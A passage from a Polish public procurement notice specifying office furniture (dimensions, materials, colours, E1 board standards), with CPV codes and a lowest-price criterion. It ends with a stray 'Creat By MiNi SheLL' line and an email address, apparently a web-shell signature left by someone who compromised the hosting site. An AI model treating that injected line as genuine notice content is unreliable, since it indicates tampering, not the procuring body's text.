z tolerancją +/- 3%;
c)	materiał - tkanina membranowa / eko-skóra koloru czarnego;
d)	wyposażony w podłokietniki;
e)	wysokość siedzisk regulowana za pomocą podnośnika pneumatycznego;
f)	stelaż - stal chromowana;
g)	kółka do powierzchni miękkich.

      6.Krzesło konferencyjne    -   14 szt.
a)	materiał - tkanina membranowa/siatka koloru czarnego;
b)	wymiary [cm] szerokość x głębokość x wysokość: 58x60x97 cm 
        z tolerancją +/- 3%;
c)	stelaż - stal chromowana;
d)	podłokietniki regulowane ze stali chromowanej i tworzywa czarnego;
e)	oparcie profilowane;
f)	stopki chroniące powierzchnię podłogi.

      7.Kaseta klawiatury mocowana pod blatem biurka       -   8 szt.
a)	obrzeże zapobiegające wysunięciu;

      8.Szafa aktowo-garderobowa    -  12 szt.
a)	wymiary  [cm] szerokość x głębokość x wysokość:  80 x 40 x 196;
b)	wykonana z płyty meblowej o grubości min. 18 mm;
c)	tył wykonany z płyty pilśniowej drewnopodobnej;
d)	uchwyty przy drzwiach satynowe;
e)	łączenie elementów za pomocą  złączy minifix i kołków meblowych;
f)	półki wewnątrz z możliwością regulacji wysokości;
g)	nóżki regulowane, aluminiowe, malowane na kolor antracyt, wysokość ok.10 cm; 
h)	wstawki ozdobne o wysokości ok.50 mm  poniżej wieńca górnego i powyżej wieńca 
        dolnego w kolorze antracyt.

      9.Regał z drzwiami pełnymi   -   9 szt.
a)	wymiary  [cm] szerokość x głębokość x wysokość:  80 x 40 x 196;
b)	drzwi pełne, dzielone;
c)	góra - 2 półki zamknięte;
d)	dół - 1 półka zamknięta;
e)	wykonana z płyty meblowej o grubości min. 18 mm;
f)	tył wykonany z płyty pilśniowej drewnopodobnej;
g)	uchwyty przy drzwiach satynowe;
h)	łączenie elementów za pomocą  złączy minifix i kołków meblowych;
i)	półki wewnątrz z możliwością regulacji wysokości;
j)	nóżki regulowane, aluminiowe, malowane na kolor antracyt, wysokość ok.10 cm;
k)	wstawki ozdobne o wysokości ok.50 mm  poniżej wieńca górnego i powyżej wieńca dolnego w kolorze antracyt.

    10. Regał    -   8 szt.
a)	wymiary  [cm] szerokość x głębokość x wysokość:  80 x 40 x 196;
b)	drzwi pełne, dzielone w dolnej części;
c)	góra - 2 półki otwarte;
d)	dół - 1 półka zamknięta;
e)	wykonana z płyty meblowej o grubości min. 18 mm;
f)	tył wykonany z płyty pilśniowej drewnopodobnej;
g)	uchwyty przy drzwiach satynowe;
h)	łączenie elementów za pomocą  złączy minifix i kołków meblowych;
i)	półki wewnątrz z możliwością regulacji wysokości;
j)	nóżki regulowane, aluminiowe, malowane na kolor antracyt, wysokość ok.10 cm;
k)	wstawki ozdobne o wysokości ok.50 mm  poniżej wieńca górnego i powyżej wieńca
       dolnego w kolorze antracyt.

    11. Stół okrągły    -   1 szt.
a)	wymiary  [cm] średnica - 85 , wysokość - 74 ;
b)	blat grubości min. 28 mm.

    12. Biurko proste    -   5 szt.
a)	wymiary  [cm] szerokość x głębokość x wysokość:  140 x 68 x 74;
b)	blat grubości min. 28 mm;
c)	nogi i łączyny grubości min. 28 mm;
d)	łączenie elementów za pomocą złączy minifix i kołków meblowych;
e)	biurko musi posiadać aluminiowe stopki z regulacją umożliwiającą poziomowanie.

    13. Kontener  na kółkach  -   1 szt.
a)	wymiary  [cm] szerokość x głębokość x wysokość:  43 x 50 x 62;
b)	blat  grubości min. 22 mm;
c)	pozostała konstrukcja grubości min. 18 mm;
d)	trzy szuflady zamykane na  zamek centralny;
e)	prowadnice rolkowe w szufladach.

    14. Dostawka do biurka kształtowego - ? koła   -   3 szt.
a)	wymiary  [cm] średnica x wysokość:  100 x 74;
b)	blat grubości min. 28 mm;
c)	noga z rury ze stali nierdzewnej szczotkowanej;
d)	podstawa nogi z płyty w kolorze blatu.

Uwagi do pakietu  III.

1.	Meble należy wykonać z płyty wiórowej oklejanej laminatem; płyta musi posiadać atest
      higieniczny wydany przez uprawniony instytut, musi odpowiadać wymaganiom
      higienicznym klasy E1;
2.	Krawędzie elementów meblowych muszą być oklejone obrzeżem PVC o gr. 1-2 mm, posiadającym atest zgodnie z którym, produkt odpowiada wymaganiom higienicznym w każdych warunkach użytkowania;
3.	Użyte kleje nie mogą stanowić zagrożenia dla zdrowia;
4.	Wymiary gabarytowe mebli nie mogą odbiegać od podanych w SIWZ o więcej niż +/- 1% za wyjątkiem poz.5 i 6;
5.	Płyty użyte do mebli oraz obrzeża muszą być w kolorze grusza jasna, pozostałe elementy w kolorze antracyt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.00.00-2, 39.11.20.00-0, 39.11.31.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com